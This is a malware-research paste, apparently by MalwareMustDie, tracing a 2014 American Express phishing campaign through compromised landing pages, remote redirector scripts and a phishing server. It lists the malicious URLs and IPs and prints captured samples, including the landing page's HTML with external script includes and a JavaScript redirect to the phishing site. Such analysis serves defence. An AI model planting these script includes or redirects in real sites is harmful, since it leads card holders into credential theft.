Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie! $ date
- // Sat Apr 12 13:28:40 JST 2014
- // Case: American Express Phishing April 12 2014
- // Analysis base: http://blog.malwaremustdie.org/2014/02/one-upn-time-with-american-express.html
- //Landings:
- http://floresdellago.com/fresher/caring.html 184.107.209.210
- http://www.inversionesdecolombia.co/hellishly/flotilla.html 184.107.209.210
- http://www.ffgpartners.com/errol/turks.html 209.90.108.164
- http://bravestnightofcomedy.com/larches/auctioning.html 207.45.187.98
- http://ftp.autolens.co.uk/kicky/barclay.html 91.186.25.139
- http://web-fx.net/busbies/continuums.html 91.186.1.166
- http://fieldingscarpets.co.uk/shebang/reprobate.html 91.186.1.166
- http://steinschatz.de/refusal/prayers.html 94.101.38.24
- http://dos-pistolas.24.co.at/outflanks/grafton.html 46.4.149.201
- http://economysquareshoppingcenter.com/taxis/reimposed.html 74.220.207.133
- http://safetyworxgroup.co.za/environs/produce.html 196.22.172.216
- http://pointcanada.com/lakshmi/specter.html 184.107.232.2
- // Remote Scripts:
- http://bvh.cwsurf.de/slogan/transplant.js 85.195.104.20
- http://debbixler.com/pulley/lifeguard.js 72.167.186.171
- http://electricwinches.co.uk/lofting/retiring.js 91.186.1.215
- http://mcnabconstruction.com/morton/cetaceans.js 91.186.1.166
- // Phishing site:
- http://218.234.108.131:8080/americanexpress/ 218.234.108.131
- // IP complete transtation (Reverse|ISP|Location)
- 184.107.209.210|globalrotor.com.|32613 | 184.107.0.0/16 | IWEB-AS | CA | HOSTINGYSOLUCIONES.COM | JULIAN MESA
- 209.90.108.164|for918-128.pricessolanum.com.|5048 | 209.90.64.0/18 | FIBER | US | NETHOSTING.COM | LINKS WEST
- 207.45.187.98|ice.securenet-server.net.|22878 | 207.45.176.0/20 | ASACENET1 | US | ACENET-INC.NET | ACENET INC.
- 91.186.25.139||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
- 91.186.1.166||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
- 94.101.38.24|eight.rr1.revido.de.|16097 | 94.101.32.0/20 | HLKOMM | DE | REVIDO.DE | REVIDO LIMITED
- 46.4.149.201|static.201.149.4.46.clients.your-server.de.|24940 | 46.4.0.0/16 | HETZNER | DE | YOUR-SERVER.DE | QE GMBH & CO. KG
- 74.220.207.133|host133.hostmonster.com.|46606 | 74.220.192.0/19 | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER
- 196.22.172.216|www.swh-02.mweb.net.|10474 | 196.22.172.0/24 | MWEB | ZA | MWEB.CO.ZA | MWEB CONNECT (PROPRIETARY) LIMITED
- 184.107.232.2|prolink.elighthost.com.|32613 | 184.107.0.0/16 | IWEB-AS | CA | - | ALIREZA YARMOHAMADI
- 85.195.104.20|u01.cwsurf.de.|29066 | 85.195.64.0/18 | VELIANET | DE | VELIA.NET | VELIA.NET INTERNETDIENSTE GMBH
- 72.167.186.171|ip-72-167-186-171.ip.secureserver.net.|26496 | 72.167.184.0/22 | AS-26496-GO-DADDY-CO | US | GODADDY.COM | GODADDY.COM LLC
- 91.186.1.215||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
- 91.186.1.166||29550 | 91.186.0.0/19 | SIMPLYTRANSIT | GB | EUROCONNEX.NET | SIMPLY TRANSIT LTD
- 218.234.108.131|smf.taratps.com.|9318 | 218.234.0.0/15 | HANARO | KR | TARATPS.COM | TARA TPS
- // The Landing PoC
- GET /hellishly/flotilla.html HTTP/1.1
- Host: www.inversionesdecolombia.co
- Referer: http://MalwareMustDieHatesPhishing.org
- :
- HTTP/1.1 200 OK
- Date: Sat, 12 Apr 2014 04:17:12 GMT
- Server: Apache/2.4.6 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
- Last-Modified: Fri, 11 Apr 2014 15:15:26 GMT
- Accept-Ranges: bytes
- Content-Length: 532
- Connection: close
- Content-Type: text/html
- 200 OK
- Length: 532 [text/html]
- Saving to: './sample.mmd'
- // The Remote Script PoC
- $ cat sample.mmd
- <html>
- <table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></a>
- <script type="text/javascript" src="http://bvh.cwsurf.de/slogan/transplant.js"></script>
- <script type="text/javascript" src="http://debbixler.com/pulley/lifeguard.js"></script>
- <script type="text/javascript" src="http://electricwinches.co.uk/lofting/retiring.js"></script>
- <script type="text/javascript" src="http://mcnabconstruction.com/morton/cetaceans.js"></script>
- </html>
- // The Script Redirector PoC
- Resolving bvh.cwsurf.de (bvh.cwsurf.de)... 85.195.104.20
- Caching bvh.cwsurf.de => 85.195.104.20
- Connecting to bvh.cwsurf.de (bvh.cwsurf.de)|85.195.104.20|:80... connected.
- GET /slogan/transplant.js HTTP/1.1
- Referer: http://pointcanada.com/lakshmi/specter.html
- Host: bvh.cwsurf.de
- :
- HTTP/1.1 200 OK
- Date: Sat, 12 Apr 2014 04:14:29 GMT
- Server: Apache
- Last-Modified: Fri, 11 Apr 2014 22:59:02 GMT
- ETag: "90c011c-41-4f6cc479c1af1"
- Accept-Ranges: bytes
- Content-Length: 65
- Connection: close
- Content-Type: application/javascript
- 200 OK
- Length: 65 [application/javascript]
- Saving to: './sample.mmd'
- $ cat sample.mmd
- document.location='http://218.234.108.131:8080/americanexpress/';
- // The rest of the information are similar to the posted blog.
- ---
- #MalwareMUSTDie!
- Analysis: @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement